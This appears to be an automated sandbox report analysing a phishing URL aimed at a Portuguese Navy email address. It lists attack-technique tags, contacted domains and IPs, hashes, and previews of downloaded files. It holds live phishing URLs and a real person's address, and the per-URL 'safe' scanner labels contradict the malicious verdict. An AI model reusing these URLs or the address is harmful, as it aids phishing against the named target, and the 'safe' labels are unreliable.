    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    File Deletion
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://encryption-marinha.jkndfuzv.ru/348mXfXab6nFv467150%Avira URL Cloudsafe
    https://yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru/1657887835646082329051glqBcpKqBSNYZZWDQURJYHHOLFEIOJYMGFQXIWHVNyzkBxoKGAwbe78mSYF72qr440%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/ijgVJ29TdMQnivj8m6zho8fxyrYaNaNm1zHY45bGv8MS122060%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/oplZe0JQgDwLxmPPrn3AcmPOKBS4ghvickIYGe8gd451400%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/yzDhxxcm7mbe0biUXnf7h5BSC0wgalccVUxATWopC0JTt9qZL8buLnc901800%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX0%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/uvzWbq53F9oUBbZ6Pvast8uNBxSwpjYvpcHgRi4X341300%Avira URL Cloudsafe
    https://yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru/1657887835646082329051glqBcpKqBSNYZZWDQURJYHHOLFEIOJYMGFQXIWHVNrsNQTs1MZKlJNYj12Wkwx400%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/GDSherpa-bold.woff20%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/34xdLZylu9sNLs7eTij0Uqz9prscZpLQu671040%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/ngCf6zNL05pFHgvTMQm9xQYlhkLm1aOsVcQy9yi320%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/ijh3pCKtx2MXEuj3T1idod88SGEmvyzP0ZxllXfeCSfXEG7N781700%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/riWV0S6MDUPLu3h0Z0Ci4P37jqadamkj00iFg1oHVLKumIGe7o0%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/rquUC4Ujp4cw4zkB8xlNj4eutC2Tc0rbylyh7BoD07FyJgw1fYfAgy0%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/abvf9t8pq9ef300%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/ijKWEY7gRXQm1JNCLSnYvcXyv9pGf253dTVw89gLm7vwI92mhs7QBmbAm2yz2300%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/GDSherpa-vf2.woff20%Avira URL Cloudsafe
    https://jygdt.tjezyf.ru/kella$z8ye070%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/GDSherpa-vf.woff20%Avira URL Cloudsafe
    https://yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru/1657887835646082329051glqBcpKqBSNYZZWDQURJYHHOLFEIOJYMGFQXIWHVNyzAC1DJrCw2cQf782PGGsdsFop420%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/GDSherpa-bold.woff0%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/favicon.ico0%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/GDSherpa-regular.woff20%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/rsvIvTvoLMZ03pS3MwX9LijbSo1tmpSLY8DjCu6chApJIUMh9R9qpcd1980%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/stLx2AXVud2xlUwbPNljeDAzdhl4A2IPUOzzCg0S5LGrFzfplmnd34wtauD5gunMCnt6yZAef2590%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/kl9Cb6f7Uuv8fQEwD093oOMERlzX9OD3Ac3VPlY56wuFWGKQ35uHV6xBNjuv2200%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/qrgnZWTorGwUDt4wh0nteDBlmP12NcjporrrNyuuep9wZWpw6ef2360%Avira URL Cloudsafe
    https://encryption-marinha.jkndfuzv.ru/GDSherpa-regular.woff0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      e329293.dscd.akamaiedge.net
      2.22.242.18
      truefalse
        high
        developers.cloudflare.com
        104.16.2.189
        truefalse
          high
          github.com
          140.82.121.3
          truefalse
            high
            jygdt.tjezyf.ru
            172.67.153.160
            truefalse
              unknown
              yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru
              104.21.0.223
              truefalse
                unknown
                encryption-marinha.jkndfuzv.ru
                104.21.43.175
                truefalse
                  unknown
                  code.jquery.com
                  151.101.66.137
                  truefalse
                    high
                    cdnjs.cloudflare.com
                    104.17.25.14
                    truefalse
                      high
                      challenges.cloudflare.com
                      104.18.95.41
                      truefalse
                        high
                        get.geojs.io
                        104.26.1.100
                        truefalse
                          high
                          www.google.com
                          142.250.186.68
                          truefalse
                            high
                            d19d360lklgih4.cloudfront.net
                            13.33.187.14
                            truefalse
                              high
                              objects.githubusercontent.com
                              185.199.108.133
                              truefalse
                                high
                                aadcdn.msauthimages.net
                                unknown
                                unknownfalse
                                  high
                                  ok4static.oktacdn.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://encryption-marinha.jkndfuzv.ru/ijgVJ29TdMQnivj8m6zho8fxyrYaNaNm1zHY45bGv8MS12206false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://encryption-marinha.jkndfuzv.ru/348mXfXab6nFv46715false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://encryption-marinha.jkndfuzv.ru/34xdLZylu9sNLs7eTij0Uqz9prscZpLQu67104false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://encryption-marinha.jkndfuzv.ru/yzDhxxcm7mbe0biUXnf7h5BSC0wgalccVUxATWopC0JTt9qZL8buLnc90180false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                      high
                                      https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://a.nel.cloudflare.com/report/v4?s=u%2F2mk9jj8%2BWPHi0neXmrxvWqgI1lGSmFkhlvUS6bAaUTOwt8tjj836LHDYZIpuyTJT1GYpu5hcb9No5XWJChYS3L09u%2Bms9dilio1EjkXvgdh%2BHYKGrt6sGqO6a%2Bfalse
                                        high
                                        https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                          high
                                          https://yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru/1657887835646082329051glqBcpKqBSNYZZWDQURJYHHOLFEIOJYMGFQXIWHVNyzkBxoKGAwbe78mSYF72qr44false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                            high
                                            https://yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru/1657887835646082329051glqBcpKqBSNYZZWDQURJYHHOLFEIOJYMGFQXIWHVNrsNQTs1MZKlJNYj12Wkwx40false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                              high
                                              https://encryption-marinha.jkndfuzv.ru/oplZe0JQgDwLxmPPrn3AcmPOKBS4ghvickIYGe8gd45140false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://challenges.cloudflare.com/turnstile/v0/b/c8ec7565fab7/api.jsfalse
                                                high
                                                https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                                  high
                                                  https://encryption-marinha.jkndfuzv.ru/GDSherpa-bold.woff2false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://encryption-marinha.jkndfuzv.ru/uvzWbq53F9oUBbZ6Pvast8uNBxSwpjYvpcHgRi4X34130false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://encryption-marinha.jkndfuzv.ru/GDSherpa-vf2.woff2false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                    high
                                                    https://encryption-marinha.jkndfuzv.ru/ngCf6zNL05pFHgvTMQm9xQYlhkLm1aOsVcQy9yi32false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://encryption-marinha.jkndfuzv.ru/GDSherpa-vf.woff2false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://encryption-marinha.jkndfuzv.ru/rquUC4Ujp4cw4zkB8xlNj4eutC2Tc0rbylyh7BoD07FyJgw1fYfAgyfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://encryption-marinha.jkndfuzv.ru/riWV0S6MDUPLu3h0Z0Ci4P37jqadamkj00iFg1oHVLKumIGe7ofalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://developers.cloudflare.com/favicon.pngfalse
                                                      high
                                                      https://encryption-marinha.jkndfuzv.ru/abvf9t8pq9ef30false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://encryption-marinha.jkndfuzv.ru/ijKWEY7gRXQm1JNCLSnYvcXyv9pGf253dTVw89gLm7vwI92mhs7QBmbAm2yz230false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://encryption-marinha.jkndfuzv.ru/ijh3pCKtx2MXEuj3T1idod88SGEmvyzP0ZxllXfeCSfXEG7N78170false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.ptfalse
                                                        unknown
                                                        https://jygdt.tjezyf.ru/kella$z8ye07false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru/1657887835646082329051glqBcpKqBSNYZZWDQURJYHHOLFEIOJYMGFQXIWHVNyzAC1DJrCw2cQf782PGGsdsFop42false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://encryption-marinha.jkndfuzv.ru/GDSherpa-regular.woff2false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://encryption-marinha.jkndfuzv.ru/rsvIvTvoLMZ03pS3MwX9LijbSo1tmpSLY8DjCu6chApJIUMh9R9qpcd198false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://encryption-marinha.jkndfuzv.ru/favicon.icofalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://encryption-marinha.jkndfuzv.ru/GDSherpa-bold.wofffalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://encryption-marinha.jkndfuzv.ru/stLx2AXVud2xlUwbPNljeDAzdhl4A2IPUOzzCg0S5LGrFzfplmnd34wtauD5gunMCnt6yZAef259false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://get.geojs.io/v1/ip/geo.jsonfalse
                                                          high
                                                          https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                                            high
                                                            https://encryption-marinha.jkndfuzv.ru/GDSherpa-regular.wofffalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://encryption-marinha.jkndfuzv.ru/kl9Cb6f7Uuv8fQEwD093oOMERlzX9OD3Ac3VPlY56wuFWGKQ35uHV6xBNjuv220false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://encryption-marinha.jkndfuzv.ru/qrgnZWTorGwUDt4wh0nteDBlmP12NcjporrrNyuuep9wZWpw6ef236false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://aadcdn.msauthimages.net/c1c6b6c8-oza7ewv53y3yvexbsc84eiyfwmickr2pstnkwdujq6s/logintenantbranding/0/bannerlogo?ts=636959481277037644false
                                                              high
                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://github.com/fent)chromecache_64.2.drfalse
                                                                high
                                                                https://www.walmart.comchromecache_66.2.drfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  142.250.186.68
                                                                  www.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  104.21.0.223
                                                                  yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ruUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  13.33.187.14
                                                                  d19d360lklgih4.cloudfront.netUnited States
                                                                  16509AMAZON-02USfalse
                                                                  104.26.1.100
                                                                  get.geojs.ioUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  2.22.242.18
                                                                  e329293.dscd.akamaiedge.netEuropean Union
                                                                  20940AKAMAI-ASN1EUfalse
                                                                  151.101.66.137
                                                                  code.jquery.comUnited States
                                                                  54113FASTLYUSfalse
                                                                  35.190.80.1
                                                                  a.nel.cloudflare.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  104.16.2.189
                                                                  developers.cloudflare.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  140.82.121.3
                                                                  github.comUnited States
                                                                  36459GITHUBUSfalse
                                                                  104.18.95.41
                                                                  challenges.cloudflare.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  172.67.153.160
                                                                  jygdt.tjezyf.ruUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  104.21.43.175
                                                                  encryption-marinha.jkndfuzv.ruUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  185.199.108.133
                                                                  objects.githubusercontent.comNetherlands
                                                                  54113FASTLYUSfalse
                                                                  104.17.25.14
                                                                  cdnjs.cloudflare.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  IP
                                                                  192.168.2.16
                                                                  192.168.2.4
                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1638470
                                                                  Start date and time:2025-03-14 12:29:33 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 3m 19s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:browseurl.jbs
                                                                  Sample URL:https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:21
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal48.phis.win@21/68@29/16
                                                                  EGA Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 0
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 142.250.185.238, 142.250.181.227, 142.250.185.78, 173.194.76.84, 142.250.184.238, 216.58.206.78, 142.250.184.206, 2.23.77.188, 199.232.210.172, 142.250.185.206, 142.250.185.110, 142.250.186.110, 142.250.185.138, 142.250.186.138, 216.58.206.74, 142.250.186.170, 142.250.186.42, 142.250.185.234, 142.250.185.106, 142.250.186.106, 142.250.185.202, 142.250.185.74, 172.217.18.106, 142.250.184.202, 142.250.186.74, 142.250.184.234, 172.217.18.10, 172.217.16.138, 142.250.181.238, 216.58.206.35, 172.217.18.14, 216.58.212.163, 142.250.186.174, 142.251.5.84, 172.217.18.110, 23.60.203.209, 52.149.20.212
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt
                                                                  No simulations
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (10017)
                                                                  Category:downloaded
                                                                  Size (bytes):10245
                                                                  Entropy (8bit):5.437589264532084
                                                                  Encrypted:false
                                                                  SSDEEP:192:LRSvXVHfVj+WdqfkkoKhUBhMAcT6iuvBiFj0gba6qiG2pPj:LQvXVHXiNkMAcT6i+4mgPj
                                                                  MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                  SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                  SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                  SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250314%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250314T113054Z&X-Amz-Expires=300&X-Amz-Signature=b36e5b21c5c25f14200202b073a138fc84a0aa21abce476eb7b59bbedfb609ce&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                  Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                  Category:downloaded
                                                                  Size (bytes):892
                                                                  Entropy (8bit):5.863167355052868
                                                                  Encrypted:false
                                                                  SSDEEP:24:qaPlKKVkz1f+tPUgo/KQGbEZAuYED9qk9neYVxyzyb7PumHe/Q/:qElbQ1f+Bo/LfAuYEJxnHDyzqyQ/
                                                                  MD5:41D62CA205D54A78E4298367482B4E2B
                                                                  SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                  SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                  SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/oplZe0JQgDwLxmPPrn3AcmPOKBS4ghvickIYGe8gd45140
                                                                  Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with very long lines (52007), with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):151218
                                                                  Entropy (8bit):5.921174275204799
                                                                  Encrypted:false
                                                                  SSDEEP:3072:oVZJmdp+k74FAB67AWHGtgpId+WiMm7GoDcf:Mjm31Q7AMGtgK+Wyqogf
                                                                  MD5:302EF7710E380AAAF291B76CCA7C4FE8
                                                                  SHA1:DCF292AF417389E3599DA6784CC14AB7BCE4D851
                                                                  SHA-256:C46364ADA31BA3E96DD4E4B71906AF89EDDA89FD4D98C31DFA45C5574DE9B9B7
                                                                  SHA-512:BB3D9FE64CBA8EE86F0B23E0A2E79C9FC7FEDFC82DBBF086B461E6A6F21E4E0D9798C275E040D6E359B4AC8DD2E6DF76CD17CDE22C161DD55DC3065BD3122FEB
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="outlooklogostyle">..body#outlooklogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}....:root {.. --s: 180px;.. --envW: 130px;.. --envH: 71px;.. --calW: 118px;.. --sqW: calc(var(--calW) / 3);.. --sqH: 37px;.. --calHH: 20px;.. --calH: calc(var(--sqH) * 3 + var(--calHH));.. --calY: calc(var(--calH) + 20px);.. --calYExt: calc(var(--calH) - 80px);.. --calYOverExt: calc(var(--calH) - 92px);.. --flapS: 96px;.. --flapH: calc(0.55 * var(--envH));.. --flapScaleY: calc(var(--flapH) / var(--flapWidth));.. --dur: 5s..}..#containerShadow,#ef{border-radius:0 0 7px 7px;}..#cal,#cal>.r{display:flex;}..#fmask,#openedFlap{width:var(--envW);height:107px;}..#ca
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):48316
                                                                  Entropy (8bit):5.6346993394709
                                                                  Encrypted:false
                                                                  SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                  Category:downloaded
                                                                  Size (bytes):36696
